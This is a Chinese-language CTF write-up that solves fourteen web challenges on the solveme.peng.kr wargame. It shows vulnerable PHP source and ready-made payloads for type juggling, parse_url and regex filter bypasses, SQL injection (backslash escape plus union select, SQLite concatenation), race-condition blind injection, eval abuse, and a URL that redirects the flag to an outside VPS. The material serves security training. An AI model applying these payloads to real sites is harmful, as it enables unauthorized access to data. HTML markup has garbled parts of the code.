Solveme.peng.kr平台Web题解教学文档<\/h1>

1. Warmup (基础反编码)<\/h2>
题目源码<\/strong>:<\/p>
<?<\/span>php<\/span>
<\/span><\/span>error_reporting<\/span>(0<\/span>);
<\/span><\/span>require<\/span> __DIR__<\/span>.<\/span>'\/lib.php'<\/span>;
<\/span><\/span>echo<\/span> base64_encode<\/span>(hex2bin<\/span>(strrev<\/span>(bin2hex<\/span>($flag)))), '<hr>'<\/span>;
<\/span><\/span>highlight_file<\/span>(__FILE__<\/span>);
<\/span><\/span><\/code><\/pre>解题步骤<\/strong>:<\/p>

给定字符串: 1wMDEyY2U2YTY0M2NgMTEyZDQyMjAzNWczYjZgMWI4NTt3YWxmY=<\/code><\/li>
反解过程:

Base64解码<\/li>
转换为16进制<\/li>
反转16进制字符串<\/li>
16进制转二进制<\/li>
<\/ul>
<\/li>
PHP代码实现:<\/li>
<\/ol>
$str =<\/span> "1wMDEyY2U2YTY0M2NgMTEyZDQyMjAzNWczYjZgMWI4NTt3YWxmY="<\/span>;
<\/span><\/span>echo<\/span> hex2bin<\/span>(strrev<\/span>(bin2hex<\/span>(base64_decode<\/span>($str))));
<\/span><\/span><\/code><\/pre>关键点<\/strong>:<\/p>

理解编码转换顺序: Base64 → Hex → Reverse → Hex2bin<\/li>
使用PHP内置函数完成转换链<\/li>
<\/ul>
2. Bad Compare (非ASCII字符比较)<\/h2>
题目源码<\/strong>:<\/p>
<?<\/span>php<\/span>
<\/span><\/span>error_reporting<\/span>(0<\/span>);
<\/span><\/span>require<\/span> __DIR__<\/span>.<\/span>'\/lib.php'<\/span>;
<\/span><\/span>if<\/span>(isset<\/span>($_GET['answer'<\/span>])){
<\/span><\/span>    if<\/span>($_GET['answer'<\/span>] ===<\/span> 'роВВхУъесЧМ'<\/span>){
<\/span><\/span>        echo<\/span> $flag;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>解题步骤<\/strong>:<\/p>

发现需要提交的answer参数包含非ASCII字符<\/li>
使用Python脚本获取原始字节:<\/li>
<\/ol>
import<\/span> requests
<\/span><\/span>import<\/span> urllib
<\/span><\/span>url =<\/span> "http:\/\/badcompare.solveme.peng.kr"<\/span>
<\/span><\/span>s =<\/span> requests.<\/span>get(url=<\/span>url)
<\/span><\/span>print urllib.<\/span>quote(s.<\/span>content[917<\/span>:927<\/span>])
<\/span><\/span><\/code><\/pre>
得到URL编码字符串: %F0%EE%C2%F5%D3%FA%E5%F1%D7%CC<\/code><\/li>
直接提交编码后的字符串<\/li>
<\/ol>
关键点<\/strong>:<\/p>

非ASCII字符在URL中的处理<\/li>
使用urllib.quote获取原始字节编码<\/li>
直接提交URL编码后的参数<\/li>
<\/ul>
3. Winter Sleep (弱类型比较+科学计数法绕过)<\/h2>
题目源码<\/strong>:<\/p>
<?<\/span>php<\/span>
<\/span><\/span>error_reporting<\/span>(0<\/span>);
<\/span><\/span>require<\/span> __DIR__<\/span>.<\/span>'\/lib.php'<\/span>;
<\/span><\/span>if<\/span>(isset<\/span>($_GET['time'<\/span>])){
<\/span><\/span>    if<\/span>(!<\/span>is_numeric<\/span>($_GET['time'<\/span>])){
<\/span><\/span>        echo<\/span> 'The time must be number.'<\/span>;
<\/span><\/span>    }else<\/span> if<\/span>($_GET['time'<\/span>] <<\/span> 60<\/span> *<\/span> 60<\/span> *<\/span> 24<\/span> *<\/span> 30<\/span> *<\/span> 2<\/span>){
<\/span><\/span>        echo<\/span> 'This time is too short.'<\/span>;
<\/span><\/span>    }else<\/span> if<\/span>($_GET['time'<\/span>] ><\/span> 60<\/span> *<\/span> 60<\/span> *<\/span> 24<\/span> *<\/span> 30<\/span> *<\/span> 3<\/span>){
<\/span><\/span>        echo<\/span> 'This time is too long.'<\/span>;
<\/span><\/span>    }else<\/span>{
<\/span><\/span>        sleep<\/span>((int<\/span>)$_GET['time'<\/span>]);
<\/span><\/span>        echo<\/span> $flag;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>解题步骤<\/strong>:<\/p>

计算范围: 5184000(6060<\/em>2430<\/em>2) ~ 7776000(6060<\/em>2430<\/em>3)<\/li>
使用科学计数法绕过sleep:

6e6<\/code> = 6000000 (在范围内)<\/li>
(int)'6e6'<\/code> = 6 (sleep很短)<\/li>
<\/ul>
<\/li>
提交payload: ?time=6e6<\/code><\/li>
<\/ol>
关键点<\/strong>:<\/p>

PHP弱类型比较特性<\/li>
科学计数法绕过sleep<\/li>
字符串到整型的转换特性<\/li>
<\/ul>
4. Hard Login (路径跳转绕过)<\/h2>
题目源码<\/strong>:<\/p>
<?<\/span>php<\/span>
<\/span><\/span>error_reporting<\/span>(0<\/span>);
<\/span><\/span>session_start<\/span>();
<\/span><\/span>require<\/span> __DIR__<\/span>.<\/span>'\/lib.php'<\/span>;
<\/span><\/span>if<\/span>(isset<\/span>($_GET['username'<\/span>], $_GET['password'<\/span>])){
<\/span><\/span>    \/\/ 验证逻辑...
<\/span><\/span><\/span><\/span>    $_SESSION['hard_login_check'<\/span>] =<\/span> true<\/span>;
<\/span><\/span>    echo<\/span> 'Login success!'<\/span>;
<\/span><\/span>    header<\/span>('Location: .\/'<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>解题步骤<\/strong>:<\/p>

发现登录成功后跳转到.\/<\/code><\/li>
直接访问index.php:<\/li>
<\/ol>
curl http:\/\/hardlogin.solveme.peng.kr\/index.php
<\/span><\/span><\/code><\/pre>
获取flag<\/li>
<\/ol>
关键点<\/strong>:<\/p>

路径跳转漏洞<\/li>
使用curl绕过前端限制<\/li>
直接访问隐藏路径<\/li>
<\/ul>
5. URL Filtering (parse_url解析漏洞)<\/h2>
题目源码<\/strong>:<\/p>
<?<\/span>php<\/span>
<\/span><\/span>error_reporting<\/span>(0<\/span>);
<\/span><\/span>require<\/span> __DIR__<\/span>.<\/span>"\/lib.php"<\/span>;
<\/span><\/span>$url =<\/span> urldecode<\/span>($_SERVER['REQUEST_URI'<\/span>]);
<\/span><\/span>$url_query =<\/span> parse_url<\/span>($url, PHP_URL_QUERY<\/span>);
<\/span><\/span>\/\/ 过滤逻辑...
<\/span><\/span><\/span><\/span>if<\/span>(isset<\/span>($_GET['do_you_want_flag'<\/span>]) &&<\/span> $_GET['do_you_want_flag'<\/span>] ==<\/span> "yes"<\/span>){
<\/span><\/span>    die<\/span>($flag);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>解题步骤<\/strong>:<\/p>

发现过滤do_you_want_flag<\/code>和yes<\/code>关键词<\/li>
利用parse_url解析特性:

添加多余斜杠混淆解析<\/li>
<\/ul>
<\/li>
payload: http:\/\/urlfiltering.solveme.peng.kr\/\/\/?do_you_want_flag=yes<\/code><\/li>
<\/ol>
关键点<\/strong>:<\/p>

parse_url函数解析漏洞<\/li>
多余斜杠绕过过滤<\/li>
URL解析不一致性<\/li>
<\/ul>
6. Hash Collision (数组绕过哈希比较)<\/h2>
题目源码<\/strong>:<\/p>
<?<\/span>php<\/span>
<\/span><\/span>error_reporting<\/span>(0<\/span>);
<\/span><\/span>require<\/span> __DIR__<\/span>.<\/span>'\/lib.php'<\/span>;
<\/span><\/span>if<\/span>(isset<\/span>($_GET['foo'<\/span>], $_GET['bar'<\/span>])){
<\/span><\/span>    if<\/span>($_GET['foo'<\/span>] ===<\/span> $_GET['bar'<\/span>]){
<\/span><\/span>        die<\/span>('Same value'<\/span>);
<\/span><\/span>    }
<\/span><\/span>    if<\/span>(hash<\/span>('sha512'<\/span>, $_GET['foo'<\/span>]) !==<\/span> hash<\/span>('sha512'<\/span>, $_GET['bar'<\/span>])){
<\/span><\/span>        die<\/span>('Different hash'<\/span>);
<\/span><\/span>    }
<\/span><\/span>    echo<\/span> $flag;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>解题步骤<\/strong>:<\/p>

需要两个不同值但相同SHA512哈希<\/li>
利用PHP数组哈希特性:

数组参数传递会返回NULL哈希<\/li>
<\/ul>
<\/li>
payload: ?foo[]=1&bar[]=2<\/code><\/li>
<\/ol>
关键点<\/strong>:<\/p>

PHP数组哈希特性<\/li>
类型混淆漏洞<\/li>
哈希函数对数组的处理<\/li>
<\/ul>
7. Array2String (非ASCII字符拼接)<\/h2>
题目源码<\/strong>:<\/p>
<?<\/span>php<\/span>
<\/span><\/span>error_reporting<\/span>(0<\/span>);
<\/span><\/span>require<\/span> __DIR__<\/span>.<\/span>'\/lib.php'<\/span>;
<\/span><\/span>$value =<\/span> $_GET['value'<\/span>];
<\/span><\/span>$username =<\/span> $_GET['username'<\/span>];
<\/span><\/span>$password =<\/span> $_GET['password'<\/span>];
<\/span><\/span>for<\/span> ($i =<\/span> 0<\/span>; $i <<\/span> count<\/span>($value); ++<\/span>$i) {
<\/span><\/span>    if<\/span> ($_GET['username'<\/span>]) unset<\/span>($username);
<\/span><\/span>    if<\/span> ($value[$i] ><\/span> 32<\/span> &&<\/span> $value[$i] <<\/span> 127<\/span>) unset<\/span>($value);
<\/span><\/span>    else<\/span> $username .=<\/span> chr<\/span>($value[$i]);
<\/span><\/span>    if<\/span> ($username ==<\/span> '15th_HackingCamp'<\/span> &&<\/span> md5<\/span>($password) ==<\/span> md5<\/span>(file_get_contents<\/span>('.\/secret.passwd'<\/span>))) {
<\/span><\/span>        echo<\/span> $flag;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>解题步骤<\/strong>:<\/p>

需要构造value数组使拼接后username为'15th_HackingCamp'<\/li>
利用chr()模256特性:

chr(321)=A<\/code>因为321%256=65='A'<\/code><\/li>
<\/ul>
<\/li>
构造payload:<\/li>
<\/ol>
?value[]=305&value[]=309&value[]=372&value[]=360&value[]=351&value[]=328
&value[]=353&value[]=355&value[]=363&value[]=361&value[]=366&value[]=359
&value[]=323&value[]=353&value[]=365&value[]=368&password=simple_passw0rd
<\/code><\/pre>
关键点<\/strong>:<\/p>

chr()函数的模256特性<\/li>
非ASCII字符拼接<\/li>
科学计数法绕过数字比较<\/li>
<\/ul>
8. Give Me a Link (URL解析混淆)<\/h2>
题目源码<\/strong>:<\/p>
<?<\/span>php<\/span>
<\/span><\/span>error_reporting<\/span>(0<\/span>);
<\/span><\/span>require<\/span> __DIR__<\/span>.<\/span>'\/lib.php'<\/span>;
<\/span><\/span>if<\/span>(isset<\/span>($_GET['url'<\/span>])){
<\/span><\/span>    $url =<\/span> $_GET['url'<\/span>];
<\/span><\/span>    if<\/span>(preg_match<\/span>('\/_|\s|\0\/'<\/span>, $url)){
<\/span><\/span>        die<\/span>('Not allowed character'<\/span>);
<\/span><\/span>    }
<\/span><\/span>    if<\/span>(!<\/span>preg_match<\/span>('\/^https?SERVER['<\/span>HTTP_HOST<\/span>'].'<\/span>\/<\/span>i<\/span>', $url)){
<\/span><\/span><\/span>        die('<\/span>Not<\/span> allowed<\/span> URL<\/span>');
<\/span><\/span><\/span>    }
<\/span><\/span><\/span>    $parse = parse_url($url);
<\/span><\/span><\/span>    if($parse['<\/span>path<\/span>'] !== '<\/span>\/<\/span>plz_give_me<\/span>'){
<\/span><\/span><\/span>        die('<\/span>Not<\/span> allowed<\/span> path<\/span>'<\/span>);
<\/span><\/span>    }
<\/span><\/span>    \/\/ 发送flag到指定主机
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>解题步骤<\/strong>:<\/p>

绕过下划线过滤: 使用%1a(替换字符)<\/li>
绕过host验证: 使用@<\/code>符号指定真实主机<\/li>
payload: http:\/\/givemealink.solveme.peng.kr\/?url=http:\/\/givemealink.solveme.peng.kr@vps_ip\/plz%1agive%1ame<\/code><\/li>
<\/ol>
关键点<\/strong>:<\/p>

URL编码特殊字符<\/li>
parse_url解析不一致性<\/li>
@符号在URL中的用途<\/li>
<\/ul>
9. Replace Filter (换行符绕过正则)<\/h2>
题目源码<\/strong>:<\/p>
<?<\/span>php<\/span>
<\/span><\/span>error_reporting<\/span>(0<\/span>);
<\/span><\/span>require<\/span> __DIR__<\/span>.<\/span>'\/lib.php'<\/span>;
<\/span><\/span>if<\/span>(isset<\/span>($_GET['say'<\/span>]) &&<\/span> strlen<\/span>($_GET['say'<\/span>]) <<\/span> 20<\/span>){
<\/span><\/span>    $say =<\/span> preg_replace<\/span>('\/^(.*)flag(.*)$\/'<\/span>, '<!-- filtered -->'<\/span>, $_GET['say'<\/span>]);
<\/span><\/span>    if<\/span>(preg_match<\/span>('\/give_me_the_flag\/'<\/span>, $say)){
<\/span><\/span>        echo<\/span> $flag;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>解题步骤<\/strong>:<\/p>

正则\/^(.*)flag(.*)$\/<\/code>不匹配换行符<\/li>
使用换行符分割字符串<\/li>
payload: ?say=%0agive_me_the_flag<\/code><\/li>
<\/ol>
关键点<\/strong>:<\/p>

正则表达式行首\/行尾匹配特性<\/li>
换行符绕过过滤<\/li>
多行字符串处理<\/li>
<\/ul>
10. Hell JS (JS混淆还原)<\/h2>
解题步骤<\/strong>:<\/p>

分析混淆JS代码<\/li>
发现大量数字拼接:

"4"+"7","4"+"7","3"+"2","1"+"0"+"3","111","111","100"...<\/code><\/li>
使用String.fromCharCode<\/code>还原:<\/li>
<\/ol>
document.write<\/span>(String.fromCharCode<\/span>(47<\/span>,47<\/span>,32<\/span>,103<\/span>,111<\/span>,111<\/span>,100<\/span>,...));
<\/span><\/span><\/code><\/pre>
得到原始JS代码包含flag<\/li>
<\/ol>
关键点<\/strong>:<\/p>

JS混淆技术<\/li>
数字到字符转换<\/li>
代码还原技巧<\/li>
<\/ul>
11. Anti SQLi (反斜杠转义绕过)<\/h2>
题目源码<\/strong>:<\/p>
<?<\/span>php<\/span>
<\/span><\/span>require<\/span> __DIR__<\/span>.<\/span>'\/lib.php'<\/span>;
<\/span><\/span>$id =<\/span> $_GET['id'<\/span>];
<\/span><\/span>$pw =<\/span> $_GET['pw'<\/span>];
<\/span><\/span>\/\/ 严格SQL过滤
<\/span><\/span><\/span><\/span>$con =<\/span> mysqli_connect<\/span>(...<\/span>);
<\/span><\/span>$result =<\/span> mysqli_fetch_array<\/span>(
<\/span><\/span>    mysqli_query<\/span>($con, "SELECT * FROM `antisqli` WHERE `id`='<\/span>{<\/span>$id}<\/span>' AND `pw`=md5('<\/span>{<\/span>$pw}<\/span>')"<\/span>)
<\/span><\/span>);
<\/span><\/span>if<\/span>(isset<\/span>($result) &&<\/span> $result['no'<\/span>] ===<\/span> '31337'<\/span>){
<\/span><\/span>    echo<\/span> $flag;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>解题步骤<\/strong>:<\/p>

发现反斜杠过滤不完整: |\\|<\/code>应为|\\\\|<\/code><\/li>
使用反斜杠转义单引号:

id=\<\/code>转义结束引号<\/li>
注释剩余部分: --%1a<\/code>(使用不可见字符)<\/li>
payload: ?id=\&pw=union all select 31337,31337,31337 from antisqli --%1a<\/code><\/li>
<\/ol>
关键点<\/strong>:<\/p>

SQL注入引号转义<\/li>
注释符绕过<\/li>
不可见字符使用<\/li>
<\/ul>
12. Name Check (SQLite字符串连接)<\/h2>
题目源码<\/strong>:<\/p>
<?<\/span>php<\/span>
<\/span><\/span>error_reporting<\/span>(0<\/span>);
<\/span><\/span>require<\/span> __DIR__<\/span>.<\/span>'\/lib.php'<\/span>;
<\/span><\/span>if<\/span>(isset<\/span>($_GET['name'<\/span>])){
<\/span><\/span>    $name =<\/span> $_GET['name'<\/span>];
<\/span><\/span>    if<\/span>(preg_match<\/span>("\/admin|0\/i"<\/span>, $name)){
<\/span><\/span>        echo<\/span> 'Not allowed input'<\/span>;
<\/span><\/span>    }
<\/span><\/span>    \/\/ SQLite查询要求name满足特定条件
<\/span><\/span><\/span><\/span>    if<\/span>( $row[0<\/span>] +<\/span> $row[1<\/span>] +<\/span> $row[2<\/span>] +<\/span> $row[3<\/span>] ===<\/span> 4<\/span> ){
<\/span><\/span>        echo<\/span> $flag;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>解题步骤<\/strong>:<\/p>

分析SQL查询需要构造'admin'但被过滤<\/li>
使用SQLite字符串连接符||<\/code><\/li>
payload: ?name=adm'||'in<\/code><\/li>
<\/ol>
关键点<\/strong>:<\/p>

SQLite字符串连接特性<\/li>
关键词分割绕过<\/li>
字符串拼接技巧<\/li>
<\/ul>
13. I Am Slowly (竞态条件利用)<\/h2>
题目源码<\/strong>:<\/p>
<?<\/span>php<\/span>
<\/span><\/span>$table =<\/span> 'iamslowly_'<\/span>.<\/span>ip2long<\/span>($_SERVER['REMOTE_ADDR'<\/span>]);
<\/span><\/span>$answer =<\/span> $_GET['answer'<\/span>];
<\/span><\/span>if<\/span>(isset<\/span>($answer)){
<\/span><\/span>    \/\/ 检查count
<\/span><\/span><\/span><\/span>    if<\/span>($result['count'<\/span>] ===<\/span> '12'<\/span>){
<\/span><\/span>        mysqli_query<\/span>($con, "DROP TABLE `<\/span>{<\/span>$table}<\/span>`;"<\/span>);
<\/span><\/span>    }
<\/span><\/span>    \/\/ 执行查询
<\/span><\/span><\/span><\/span>    $randtime =<\/span> mt_rand<\/span>(1<\/span>, 10<\/span>);
<\/span><\/span>    $result =<\/span> mysqli_fetch_array<\/span>(
<\/span><\/span>        mysqli_query<\/span>($con, "SELECT * FROM `<\/span>{<\/span>$table}<\/span>` WHERE sleep(<\/span>{<\/span>$randtime}<\/span>) OR `answer`='<\/span>{<\/span>$answer}<\/span>'"<\/span>)
<\/span><\/span>    );
<\/span><\/span>    \/\/ 更新count
<\/span><\/span><\/span><\/span>    mysqli_query<\/span>($con, "UPDATE `<\/span>{<\/span>$table}<\/span>` SET `count`=`count`+1;"<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>解题步骤<\/strong>:<\/p>

利用竞态条件:

先发送sleep(50)请求卡住<\/li>
快速发送正常请求使count=12<\/li>
sleep请求完成后count=13绕过限制<\/li>
<\/ul>
<\/li>
编写盲注脚本获取answer<\/li>
<\/ol>
关键点<\/strong>:<\/p>

竞态条件利用<\/li>
时间盲注技巧<\/li>
并发请求处理<\/li>
<\/ul>
14. Check Via Eval (短标签输出)<\/h2>
题目源码<\/strong>:<\/p>
<?<\/span>php<\/span>
<\/span><\/span>error_reporting<\/span>(0<\/span>);
<\/span><\/span>require<\/span> __DIR__<\/span>.<\/span>'\/lib.php'<\/span>;
<\/span><\/span>$exam =<\/span> 'return\''<\/span>.<\/span>sha1<\/span>(time<\/span>()).<\/span>'\';'<\/span>;
<\/span><\/span>if<\/span> (eval<\/span>($_GET['flag'<\/span>]) ===<\/span> sha1<\/span>($flag)) {
<\/span><\/span>    echo<\/span> $flag;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>解题步骤<\/strong>:<\/p>

绕过过滤直接输出flag:

使用短标签<?= ?><\/code><\/li>
<\/ul>
<\/li>
构造payload:

?flag=$a='alag';$a{0}='f';?><\/code><\/li>
<\/ol>
关键点<\/strong>:<\/p>

PHP短标签使用<\/li>
字符串操作绕过过滤<\/li>
eval函数特性利用<\/li>
<\/ul>